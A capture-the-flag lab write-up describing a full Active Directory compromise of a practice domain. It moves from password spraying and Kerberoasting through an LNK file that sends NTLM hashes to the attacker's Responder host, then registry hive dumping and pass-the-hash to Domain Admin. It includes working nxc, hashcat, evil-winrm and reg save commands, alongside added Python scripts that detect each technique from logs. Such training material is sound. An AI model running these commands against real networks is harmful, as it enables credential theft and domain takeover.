HackSmarter Lab — BuildingMagic: Active Directory Full Compromise
Scope and Objective
Objective: As a penetration tester on the Hack Smarter Red Team, the goal is to achieve a full compromise of the Active Directory environment — obtaining both user.txt and root.txt.
Initial Access: A prior enumeration phase yielded a leaked database containing usernames and hashed passwords. These credentials serve as the starting point for gaining initial access.
Execution: Leverage the compromised credentials to escalate privileges, move laterally through Active Directory, and fully compromise the domain.
Environment Setup
Step 1 — Connect to the Lab
The lab is accessed over a VPN tunnel provided by HackSmarter. Connecting via OpenVPN assigns us a tun0 interface on the 10.200.25.x subnet, giving us network-level access to the target AD environment.
```bash
sudo openvpn ad_challenge_lab_bui.ovpn
```
Step 2 — Configure /etc/hosts
Since we don’t have access to the domain’s internal DNS server yet, we manually map the domain controller’s hostname to its IP address in /etc/hosts. This allows tools like NetExec and Evil-WinRM to resolve buildingmagic.local and dc01.buildingmagic.local correctly without DNS lookups.
```
10.1.231.195 buildingmagic.local dc01.buildingmagic.local
```
Initial Access — Credential Cracking and Password Spraying
Step 3 — Crack the Leaked Hashes
The leaked database contains MD5 hashed passwords for 10 domain users across various roles within the Building Magic organisation. MD5 is a fast algorithm and these hashes are stored without a salt — making them trivially crackable using a wordlist like rockyou.txt or online lookup services.
| Username | Full Name | Role |
|---|---|---|
| r.widdleton | Ron Widdleton | Intern Builder |
| n.bottomsworth | Neville Bottomsworth | Planner |
| l.layman | Luna Layman | Planner |
| c.smith | Chen Smith | Builder |
| d.thomas | Dean Thomas | Builder |
| s.winnigan | Samuel Winnigan | HR Manager |
| p.jackson | Parvati Jackson | Shift Lead |
| b.builder | Bob Builder | Electrician |
| t.ren | Theodore Ren | Safety Officer |
| e.macmillan | Ernest Macmillan | Surveyor |
After cracking, two plaintext passwords are recovered:
```
lilronron
shadowhex7
```
Step 4 — Password Spraying with NetExec
With valid usernames but uncertain which account maps to which password, we perform a password spray — testing each cracked password against all users. The --continue-on-success flag ensures NetExec doesn’t stop at the first hit, allowing us to identify every valid combination in a single pass. Because each pass tries only one password per account, every account accrues a single failed attempt, which keeps the spray below typical lockout thresholds.
```bash
nxc smb buildingmagic.local -u users.txt -p 'lilronron' --continue-on-success
```
The user r.widdleton successfully authenticates with lilronron. We now have a valid foothold inside the domain as a low-privileged user.
```bash
nxc smb buildingmagic.local -u 'r.widdleton' -p 'lilronron'
```
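From the defender's side, the spray above shows up in the domain controller's Security log as many failed logons (Event ID 4625) from one source against many different accounts in a short window. The following Python script, added here as an example and not part of the original write-up, runs that check over a constructed set of simplified 4625 records; the field layout, timestamps and source IPs are assumed for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: simplified 4625 (failed logon) records, one per line.
# A spray looks like one source hitting many distinct accounts in a short window.
SAMPLE_LOG = """\
2024-05-01T10:00:01 EventID=4625 TargetUserName=r.widdleton IpAddress=10.200.25.33 Status=0xC000006D
2024-05-01T10:00:02 EventID=4625 TargetUserName=n.bottomsworth IpAddress=10.200.25.33 Status=0xC000006D
2024-05-01T10:00:02 EventID=4625 TargetUserName=l.layman IpAddress=10.200.25.33 Status=0xC000006D
2024-05-01T10:00:03 EventID=4625 TargetUserName=c.smith IpAddress=10.200.25.33 Status=0xC000006D
2024-05-01T10:00:03 EventID=4625 TargetUserName=d.thomas IpAddress=10.200.25.33 Status=0xC000006D
2024-05-01T10:00:04 EventID=4625 TargetUserName=s.winnigan IpAddress=10.200.25.33 Status=0xC000006D
2024-05-01T10:05:00 EventID=4625 TargetUserName=b.builder IpAddress=10.1.231.50 Status=0xC000006D
2024-05-01T10:05:30 EventID=4625 TargetUserName=b.builder IpAddress=10.1.231.50 Status=0xC000006D
"""

LINE_RE = re.compile(r"^(\S+)\s+(.*)$")

def parse_events(text):
    """Turn 'timestamp key=value ...' lines into dicts with a parsed 'ts' field."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        fields = dict(kv.split("=", 1) for kv in m.group(2).split())
        fields["ts"] = datetime.fromisoformat(m.group(1))
        events.append(fields)
    return events

def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Map source IP -> sorted distinct target accounts for every source whose
    failed logons reach min_users distinct accounts inside one sliding window."""
    by_src = defaultdict(list)
    for ev in events:
        if ev.get("EventID") == "4625":
            by_src[ev["IpAddress"]].append((ev["ts"], ev["TargetUserName"]))
    hits = {}
    for src, attempts in by_src.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            users = {u for t, u in attempts[i:] if t - start <= window}
            if len(users) >= min_users:
                hits[src] = sorted(users)
                break
    return hits

if __name__ == "__main__":
    for src, users in detect_spray(parse_events(SAMPLE_LOG)).items():
        print(f"possible password spray from {src}: {len(users)} accounts {users}")
```

The repeated failures for a single account from 10.1.231.50 are a plain lockout or typo pattern and are deliberately not flagged.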
Enumeration — SMB Shares and BloodHound
SMB Share Enumeration
The first thing to do with any domain user is enumerate accessible SMB shares. Even read access to internal shares can expose sensitive files, configurations, or credentials left behind by administrators.
```bash
nxc smb buildingmagic.local -u 'r.widdleton' -p 'lilronron' --shares
```
A non-default share stands out: File-Share — described as the “Central Repository of Building Magic’s files.” This is worth revisiting once we have higher-privileged access.
BloodHound AD Enumeration
BloodHound is the go-to tool for visualising Active Directory attack paths. It ingests data collected via LDAP and maps out relationships between users, groups, computers, and ACLs. Even a low-privileged domain user can collect all this data, since LDAP is readable by any authenticated account by default.
```bash
nxc ldap dc01.buildingmagic.local -u 'r.widdleton' -p 'lilronron' \
--bloodhound --collection All --dns-server 10.1.231.195
```
Analysing r.widdleton in BloodHound shows only default group memberships with no direct privilege escalation paths — a dead end from this account alone.
Privilege Escalation — Kerberoasting
Step 5 — Kerberoasting
Kerberoasting is a technique that abuses the Kerberos authentication protocol. Any domain user can request a Ticket Granting Service (TGS) ticket for any account that has a Service Principal Name (SPN) registered. Part of the TGS is encrypted with a key derived from the service account’s password (for RC4, its NTLM hash) — meaning we can request it and crack it offline, so the only interaction with the domain controller is the initial ticket request.
```bash
nxc ldap dc01.buildingmagic.local -u 'r.widdleton' -p 'lilronron' \
--kerberoasting output.txt
```
A TGS hash (type $krb5tgs$23) is returned for the r.haggard account. This is a Kerberos 5 RC4-encrypted TGS, which is crackable with hashcat using mode 13100. We crack it offline against rockyou.txt:
```bash
hashcat -m 13100 output.txt /usr/share/wordlists/rockyou.txt
```
Cracked password: rubeushagrid
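Each TGS request in Step 5 is logged on the DC as Event ID 4769, and the RC4 ticket that hashcat mode 13100 cracks corresponds to TicketEncryptionType 0x17 (etype 23) in that event. The script below, an added example rather than anything from the original post, flags requesters that obtain RC4 service tickets for user accounts with SPNs, excluding machine accounts and krbtgt. The event field layout, the sample IPs and the svc_example account are constructed for the demonstration.

```python
from collections import defaultdict

# Constructed sample of TGS request events (Event ID 4769), one per line, key=value fields.
# Only the fields used here are shown; real events carry many more.
SAMPLE_4769 = """\
EventID=4769 TargetUserName=r.widdleton@BUILDINGMAGIC.LOCAL ServiceName=DC01$ TicketEncryptionType=0x12 IpAddress=10.1.231.40
EventID=4769 TargetUserName=r.widdleton@BUILDINGMAGIC.LOCAL ServiceName=r.haggard TicketEncryptionType=0x17 IpAddress=10.200.25.33
EventID=4769 TargetUserName=h.grangon@BUILDINGMAGIC.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.1.231.41
EventID=4769 TargetUserName=r.widdleton@BUILDINGMAGIC.LOCAL ServiceName=svc_example TicketEncryptionType=0x17 IpAddress=10.200.25.33
EventID=4769 TargetUserName=h.grangon@BUILDINGMAGIC.LOCAL ServiceName=DC01$ TicketEncryptionType=0x17 IpAddress=10.1.231.41
"""

RC4_HMAC = "0x17"   # etype 23, the $krb5tgs$23$ format that hashcat mode 13100 cracks

def parse_4769(text):
    """Parse key=value event lines into dicts (one dict per non-empty line)."""
    return [dict(kv.split("=", 1) for kv in line.split())
            for line in text.splitlines() if line.strip()]

def is_roastable_target(service):
    """Machine accounts (trailing $) carry long random passwords and krbtgt tickets
    are normal TGS traffic; a ticket for any other SPN account is worth attention."""
    return not service.endswith("$") and service.lower() != "krbtgt"

def detect_kerberoast(events):
    """Map requester -> sorted list of user-account SPNs for which an RC4 service
    ticket was issued. In a domain that normally negotiates AES, a low-privileged
    user collecting RC4 tickets for several service accounts is the signature."""
    hits = defaultdict(set)
    for ev in events:
        if ev.get("EventID") != "4769" or ev.get("TicketEncryptionType") != RC4_HMAC:
            continue
        if is_roastable_target(ev["ServiceName"]):
            hits[ev["TargetUserName"]].add(ev["ServiceName"])
    return {user: sorted(svcs) for user, svcs in hits.items()}

if __name__ == "__main__":
    for user, services in detect_kerberoast(parse_4769(SAMPLE_4769)).items():
        print(f"{user} obtained RC4 service tickets for: {', '.join(services)}")
```

The corresponding mitigation is to move service accounts to long random passwords (gMSAs) and to disable RC4 for them, so that any 0x17 request becomes an anomaly in its own right.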
Lateral Movement — ForceChangePassword
Step 6 — Enumerate r.haggard’s Permissions
With r.haggard’s credentials in hand, we authenticate and re-enumerate to understand what this account can access and what privileges it holds in the domain.
```bash
nxc smb buildingmagic.local -u 'r.haggard' -p 'rubeushagrid' --shares
```
After marking r.haggard as owned in BloodHound and re-analysing the graph, a critical ACL edge is revealed:
R.HAGGARD has ForceChangePassword over H.POTCH — this ACL permission allows changing another user’s password without knowing their current password.
This is a common misconfiguration in AD environments where helpdesk-like roles are granted excessive account management permissions.
Step 7 — Abuse ForceChangePassword
We exploit this ACL using the NetExec change-password module, which performs the password reset over SMB without needing to know h.potch’s current password.
```bash
nxc smb buildingmagic.local -u 'r.haggard' -p 'rubeushagrid' \
-M change-password -o USER=h.potch NEWPASS=hacksmarterisawesome
```
We verify the new credentials are valid:
```bash
nxc smb buildingmagic.local -u 'h.potch' -p 'hacksmarterisawesome' --shares
```
h.potch has READ, WRITE access to the File-Share — a significant upgrade over what we had before.
Credential Capture — LNK File + Responder
Step 8 — Explore the Writable Share
We use smbclient-ng to interactively browse the File-Share and understand its contents:
```bash
smbclientng -u 'h.potch' -p 'hacksmarterisawesome' -d buildingmagic.local \
--host 10.1.231.195
```
The share is currently empty — but write access opens up an interesting attack vector. If other domain users browse this share (which is common for a “Central Repository”), we can plant a malicious file that forces their machine to authenticate back to us, leaking their NTLM hash.
Step 9 — Deploy LNK File via Slinky Module
A .lnk (shortcut) file can be crafted to point its icon path to a UNC path on our attacker machine (e.g., \\10.200.25.33\share). When any user opens the folder containing the shortcut in Windows Explorer, their system automatically attempts to resolve the icon — triggering an NTLM authentication attempt to our machine. We capture this with Responder.
The NetExec slinky module automates the creation and upload of this malicious LNK file:
```bash
nxc smb buildingmagic.local -u 'h.potch' -p 'hacksmarterisawesome' \
-M slinky -o SERVER=10.200.25.33 NAME=hacksmarter3
```
With Responder listening on our tun0 interface, we wait for a domain user to browse the share. Shortly after, a NetNTLMv2 hash is captured for h.grangon:
```
[SMB] NTLMv2-SSP Username : BUILDINGMAGIC\h.grangon
[SMB] NTLMv2-SSP Hash : h.grangon::BUILDINGMAGIC:2e892b8635e20f7f:...
```
Step 10 — Crack the NetNTLMv2 Hash
Unlike NTLM hashes, NetNTLMv2 hashes cannot be used directly for Pass-the-Hash. However, they can be cracked offline. Hashcat mode 5600 handles NetNTLMv2:
```bash
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
```
Cracked password: magic4ever
Initial Foothold — WinRM Shell
Step 11 — Authenticate as h.grangon
We validate the credentials and enumerate share access for this new account:
```bash
nxc smb buildingmagic.local -u 'h.grangon' -p 'magic4ever' --shares
```
Reviewing h.grangon in BloodHound reveals membership in the Remote Management Users group. This group grants access to Windows Remote Management (WinRM) on port 5985 — meaning we can get an interactive shell on the domain controller.
Step 12 — WinRM Shell via Evil-WinRM
Evil-WinRM provides a feature-rich WinRM shell with built-in file upload/download, PowerShell script loading, and more:
```bash
evil-winrm -i buildingmagic.local -u 'h.grangon' -p 'magic4ever'
```
Capture user.txt
```powershell
cd Desktop
cat user.txt
```
Privilege Escalation — SeBackupPrivilege
Step 13 — Identify SeBackupPrivilege
After landing on the machine, we check what privileges the current user holds:
```powershell
whoami /priv
```
SeBackupPrivilege is enabled. This Windows privilege was designed to allow backup software to read any file regardless of its DACL permissions — including files normally restricted to SYSTEM or Administrator. Attackers abuse this to read the SAM and SYSTEM registry hives, which contain local account NTLM hashes.
Step 14 — Dump SAM and SYSTEM Hives
We save copies of the SAM and SYSTEM hives from the registry to disk, then download them to our attacker machine using Evil-WinRM’s built-in download command:
```powershell
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
```
```
download system
download sam
```
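A defender's counterpart to Step 14: saving the SAM or SYSTEM hive with reg.exe is rarely legitimate on a domain controller, and with command-line auditing enabled (Security 4688 with the process command line, or Sysmon Event 1) it leaves a distinctive record. The script below, added here as an example and not from the original post, normalises the command line and flags saves of the credential hives; it goes slightly beyond the page by also catching the SECURITY hive and the long HKEY_LOCAL_MACHINE form. The tab-separated record layout and sample timestamps are constructed.

```python
import re

# Constructed sample of process-creation records, one per line, tab-separated:
# timestamp, account, command line (as a 4688 CommandLine field would carry it).
SAMPLE_PROC = """\
2024-05-01T11:02:10\tBUILDINGMAGIC\\h.grangon\treg save hklm\\sam c:\\Temp\\sam
2024-05-01T11:02:12\tBUILDINGMAGIC\\h.grangon\tREG.EXE SAVE "HKEY_LOCAL_MACHINE\\SYSTEM" C:\\Temp\\system
2024-05-01T11:03:00\tBUILDINGMAGIC\\h.grangon\treg query hklm\\software\\microsoft\\windows nt\\currentversion
2024-05-01T11:04:00\tNT AUTHORITY\\SYSTEM\tC:\\Windows\\System32\\reg.exe save hklm\\software\\policies c:\\backup\\policies.hiv
"""

HIVE_ALIASES = {"hkey_local_machine": "hklm"}
SENSITIVE_HIVES = ("hklm\\sam", "hklm\\system", "hklm\\security")
# reg or reg.exe (optionally with a path), the 'save' verb, then the key (maybe quoted)
REG_SAVE_RE = re.compile(r'(?:^|[\\\s])reg(?:\.exe)?\s+save\s+"?([^"\s]+)"?', re.IGNORECASE)

def normalize_key(key):
    """Lower-case, unify slashes and expand the long root name to its short alias."""
    key = key.lower().replace("/", "\\").rstrip("\\")
    root, sep, rest = key.partition("\\")
    return HIVE_ALIASES.get(root, root) + sep + rest

def extract_hive_save(cmdline):
    """Return the normalised registry key a 'reg save' command targets, else None."""
    m = REG_SAVE_RE.search(cmdline)
    return normalize_key(m.group(1)) if m else None

def is_sensitive_hive(key):
    return any(key == h or key.startswith(h + "\\") for h in SENSITIVE_HIVES)

def detect_hive_dumps(text):
    """Return (timestamp, account, key) for every credential-hive save in the records."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, account, cmdline = line.split("\t", 2)
        key = extract_hive_save(cmdline)
        if key and is_sensitive_hive(key):
            hits.append((ts, account, key))
    return hits

if __name__ == "__main__":
    for ts, account, key in detect_hive_dumps(SAMPLE_PROC):
        print(f"{ts} {account} saved {key} to disk (possible credential dump)")
```

Pairing this with the enabled-privilege list from whoami /priv (SeBackupPrivilege held by a non-backup account) raises the confidence of the alert.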
Step 15 — Extract NTLM Hashes with Impacket
impacket-secretsdump parses the SAM hive using the boot key taken from the SYSTEM hive (needed to decrypt the SAM’s stored hashes) and extracts all local account NTLM hashes:
```bash
impacket-secretsdump -sam sam -system system local
```
The local Administrator’s NTLM hash is extracted:
```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:520126a03f5d5a8d836f1c4f34ede7ce:::
```
Domain Compromise — Hash Spraying and Pass-the-Hash
Step 16 — Spray Administrator Hash Across Domain Users
Direct Pass-the-Hash authentication using the Administrator hash against the DC fails — the local Administrator account is not a domain admin. However, in many organisations, administrators reuse the same local administrator password across multiple machines and even domain accounts. We spray the hash against all known domain users to check for this pattern:
```bash
nxc smb buildingmagic.local -u users.txt \
-H 520126a03f5d5a8d836f1c4f34ede7ce --continue-on-success
```
The hash authenticates successfully as a.flatch — confirming password reuse between the local Administrator account and this domain user.
BloodHound confirms a.flatch is a member of the Domain Admins group — full domain compromise is one step away.
Step 17 — Pass-the-Hash as Domain Admin
Pass-the-Hash allows authenticating with an NTLM hash directly without needing the plaintext password. Evil-WinRM supports this natively with the -H flag:
```bash
evil-winrm -i buildingmagic.local -u 'a.flatch' \
-H 520126a03f5d5a8d836f1c4f34ede7ce
```
Capture root.txt
```powershell
cd C:\Users\Administrator\Desktop
cat root.txt
```
Domain fully compromised.
Attack Chain Summary
```
Leaked DB (MD5 hashes)
→ Password Spray → r.widdleton (lilronron)
→ Kerberoasting → r.haggard (rubeushagrid)
→ ForceChangePassword ACL → h.potch (hacksmarterisawesome)
→ LNK File + Responder → h.grangon (magic4ever)
→ WinRM Shell → user.txt
→ SeBackupPrivilege → SAM/SYSTEM dump
→ impacket-secretsdump → Administrator NTLM hash
→ Hash Spray → a.flatch (password reuse)
→ Pass-the-Hash → Domain Admin → root.txt
```
Tools Used
| Tool | Purpose |
|---|---|
| NetExec (nxc) | SMB/LDAP enumeration, password spraying, Kerberoasting, modules |
| Hashcat | Offline hash cracking (MD5, Kerberos TGS, NetNTLMv2) |
| BloodHound | AD attack path visualisation and ACL analysis |
| smbclient-ng | Interactive SMB share browsing |
| Responder | NetNTLMv2 hash capture via LLMNR/NBT-NS poisoning |
| Evil-WinRM | WinRM shell with file transfer support |
| Impacket secretsdump | SAM/SYSTEM hive parsing and hash extraction |